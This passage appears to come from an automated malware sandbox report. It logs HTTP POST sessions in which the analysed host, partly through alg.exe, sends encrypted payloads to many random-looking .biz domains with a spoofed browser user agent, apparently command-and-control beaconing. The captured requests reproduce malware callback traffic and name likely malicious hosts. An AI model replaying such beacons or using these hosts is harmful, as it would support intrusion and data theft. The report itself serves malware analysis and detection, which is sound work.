                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:33.642745972 CET778OUTData Raw: 85 2d 26 19 98 42 41 04 fe 02 00 00 ae 4a 70 c7 cc c7 60 43 fc 53 9e 1f c5 3a 54 bf d0 28 cb d4 86 e8 3a 71 26 73 ea 20 76 92 72 70 7e d5 14 ca 9c e8 2f 9c 21 dd 3f 6a 35 cb 8b fa df 1d 77 6f 30 67 6d 77 dd 77 a0 de d2 9c 61 57 70 14 26 b3 b8 a4
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: -&BAJp`CS:T(:q&s vrp~/!?j5wo0gmwwaWp&{+`s{ly-W}{pDA'Ha&CY7jz- \t8@O3^ID3htS*t1!?/\vfCJlPK4O
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:34.473037958 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=59a0e1c66ce28943c676eb8c951f4998|155.94.241.187|1731920314|1731920314|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      107192.168.2.75008613.251.16.15080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:33.847122908 CET346OUTPOST /n HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:33.847156048 CET842OUTData Raw: 00 25 97 11 e6 8c 58 2b 3e 03 00 00 2d 66 3a 37 f2 70 ab 16 e4 0e f3 11 8f dd bb 7d be 42 82 6d d4 f9 a7 f0 c6 d2 51 f4 45 07 22 c6 9e d3 90 e1 e3 f1 bc 4f 23 9c 5e e3 7d 3c cd 2d 96 54 79 3d 26 9e d1 2b 77 ac cc 5d 70 9b 47 fd 27 ec 48 5c 22 b4
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: %X+>-f:7p}BmQE"O#^}<-Ty=&+w]pG'H\"^f:iWCR}Q8H`zKU&oBIb4a\[%'crl{+/ZC'M"f${gBha:GZ#"lR'tHs"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:35.281685114 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=57e0ef366fbcb3df848006d3df93753a|155.94.241.187|1731920315|1731920315|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      108192.168.2.75008744.221.84.105805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:34.777458906 CET348OUTPOST /bjmq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:34.777486086 CET778OUTData Raw: 2b ca 2c f4 c1 20 25 5e fe 02 00 00 ca d9 5c 5f 86 4d fa 8a cf 31 12 2a c3 46 a6 f6 c6 70 8c 61 6d 11 98 94 f0 e3 ab bc f9 e6 1b 47 16 5e 40 2e 22 74 21 b7 c4 ef 4b 57 c4 16 b5 74 0e da ae 23 da cf b5 53 67 b7 f4 81 19 d5 fe 6a 1f e1 d9 74 05 83
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: +, %^\_M1*FpamG^@."t!KWt#Sgjt_7<}=7zs/R6tM9fs^>2^b?5m/Q7hi)/(lb-eHV-&wyhBpiRk{++:n&969|qL(S2t(W
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:35.436664104 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=1f9a62ebf00b2d7f1021a4d0c2c18204|155.94.241.187|1731920315|1731920315|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      109192.168.2.75008834.211.97.4580
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:35.306063890 CET354OUTPOST /fcyfmvndcv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:35.306086063 CET842OUTData Raw: 89 c0 b8 2c 2b ce f0 99 3e 03 00 00 90 da 64 e3 27 90 1b 83 19 1a a9 d9 d4 04 dd df fc b3 bc 54 e1 1b b3 e5 62 5e d7 39 62 a9 fb 61 e6 a4 3d cc 42 80 60 7d 2a 37 4d c8 8f 6c 11 d7 b3 17 2f cb 69 2f 1b 7b 08 9b ff 0f 0c d2 ab 88 60 70 61 30 21 98
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ,+>d'Tb^9ba=B`}*7Ml/i/{`pa0!xKZ^"2et>Kp;S^ \6*(yMe.-]+xSi#bs1@Q)Vss:YdiyMbSw4`JlSr~#[!CQD9=\x Ubl)_!
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:36.127604961 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=b3d438f9888a78935b26d700073727fb|155.94.241.187|1731920316|1731920316|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      110192.168.2.75008954.244.188.177805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:36.289880037 CET350OUTPOST /qtsndkyu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:36.289906025 CET778OUTData Raw: c9 ed 25 c3 85 1e a9 33 fe 02 00 00 d7 92 51 b5 fe 88 27 a1 1c 9b 8a 94 5a c0 8d 39 b0 ec 96 ba f5 e0 8d a2 59 bd 9e 33 db a1 c8 fb 56 bc 57 44 91 e0 2b c5 be a5 0b 65 83 50 e9 47 a7 8c 35 b1 66 c8 6a 39 6b 38 c7 51 8e 87 fa 0a 1d 48 ef 28 35 33
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: %3Q'Z9Y3VWD+ePG5fj9k8QH(53ltm1c*Du3cy:<[\qb,3P4oAKd4[Pu[?:G'+]L#/VND$a+:3G;UB
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:37.118484020 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=3f0cda68be9d6e59b637f8ac4276b646|155.94.241.187|1731920316|1731920316|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      111192.168.2.75009047.129.31.21280
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:36.384373903 CET352OUTPOST /pnuofhgyvs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:36.384386063 CET842OUTData Raw: 49 9e a1 48 32 05 46 06 3e 03 00 00 89 95 46 54 61 0e f8 03 38 c4 23 51 49 1a 78 6f 14 a7 9c 7a d3 29 6c 60 d9 27 7e 59 9c 7b 0c d1 0a f9 e4 f8 cb 0d 63 af bf 16 30 60 ae ec 78 66 42 da 6d d1 45 91 31 0d e0 a4 31 a2 bc 6d 3f 68 12 f7 6d f7 52 e9
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: IH2F>FTa8#QIxoz)l`'~Y{c0`xfBmE11m?hmRabFkv${,P^4&f$W35g1WdcFmL.s~9,|c`FyN56&,hM-YnrHKv$P#N2)?BQ@jU6nSVD
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:37.848440886 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=85116d0ba2c95ce3ff9014b5048d380e|155.94.241.187|1731920317|1731920317|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      112192.168.2.7500913.254.94.185805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:37.406847000 CET345OUTPOST /pwpf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:37.406868935 CET778OUTData Raw: 6f 89 2b 9e ad fc 8e 8d fe 02 00 00 d9 c3 40 40 30 9c 41 ed ad 97 3e 13 21 29 14 bc 0b 29 55 25 f5 f1 a8 38 4b 1b aa 15 f7 c7 c6 bd 9f 4d f2 d2 b4 29 99 90 20 89 92 e5 dc 93 fe ed 0a 8b 36 6b ca c4 32 bd 22 cd 17 65 02 28 13 42 6c f6 51 e1 fa 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: o+@@0A>!))U%8KM) 6k2"e(BlQ\8&9jSkJ=poOx;VkK,>G8Dd-Gn'W*P{Hq^qG_@908]s943+TKO}/(69
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:38.992995024 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=5628032f0d3354b9d0c477bb36fc08fe|155.94.241.187|1731920318|1731920318|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      113192.168.2.75009213.251.16.15080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:37.873622894 CET355OUTPOST /hcvbujevnkcp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:37.873641968 CET842OUTData Raw: 3b c5 c7 4d c9 1f ec 8b 3e 03 00 00 e4 41 a0 49 38 e4 43 43 3e 8b 5a c9 ae 4c b4 71 2e 44 b4 dc 01 18 c1 90 93 cf e6 c6 b5 04 0d 93 80 4d ed da 68 b8 6d 86 37 d9 1b 50 fa 95 a7 ec b4 0a a1 ab fa 17 34 3f 46 b6 d5 94 b5 4f 80 ce 41 65 83 74 e9 b2
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ;M>AI8CC>ZLq.DMhm7P4?FOAetk1PGzU6ADsCAD)E=&$d:`1YC519Cqqo3ged+qln!6rm7o-e
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:39.292785883 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=93e6100055fef32f2f724e8e4d4672d1|155.94.241.187|1731920319|1731920319|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      114192.168.2.75009334.211.97.4580
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:39.455161095 CET354OUTPOST /sksexgcippwxc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:39.455161095 CET842OUTData Raw: 5c 9e a6 12 78 bb 43 a3 3e 03 00 00 65 8c 0d b2 8a c0 03 c0 90 e9 ef b0 c2 ef 2d 2f 49 41 a1 15 8c 5c 73 92 fe 6c f4 7b d6 b5 16 47 d1 d8 df cd dc 42 8c e1 d7 46 c1 03 f0 20 b2 c1 4c a3 f2 9d 70 18 19 03 d7 a7 46 09 76 9d 2a 21 b4 f4 0e 23 13 ef
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: \xC>e-/IA\sl{GBF LpFv*!#)C3<Z5%/]:HpF`#3Z,u=Dw{v-pC}uW_gA2EGyGs&o/C|GWt2x5OS|7Zjkq\grwJ`
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:40.271845102 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=768bb14553bdbc40a80950a7276e7960|155.94.241.187|1731920320|1731920320|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      115192.168.2.75009418.141.10.107805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:39.772481918 CET354OUTPOST /esxyeqyttv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:39.772495985 CET778OUTData Raw: d2 d3 15 2a 4e ea 6e 86 fe 02 00 00 9c 97 94 8c cf 7f 25 5b cf ac a7 f6 7e 58 ec 8d bd 54 49 61 19 88 23 18 34 13 5b 16 fb ec aa de 7a f0 d6 32 a0 ea 5e fb ae da 92 32 3f bf f8 3d 92 3d 75 8f f8 79 8e 6d cd a0 0c 27 42 96 cb 9e 14 81 0a fc 67 54
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: *Nn%[~XTIa#4[z2^2?==uym'BgTi?AW\rF)SEW~N8fNXi>~&2tCgL=^O6MJhC(<I+N]P;SLTH&=>.vs,z_KdDWlP\
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:41.233534098 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=940dae1772f7d066f75a3aca098ff79c|155.94.241.187|1731920320|1731920320|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      116192.168.2.7500953.94.10.3480
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:40.449894905 CET347OUTPOST /rq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
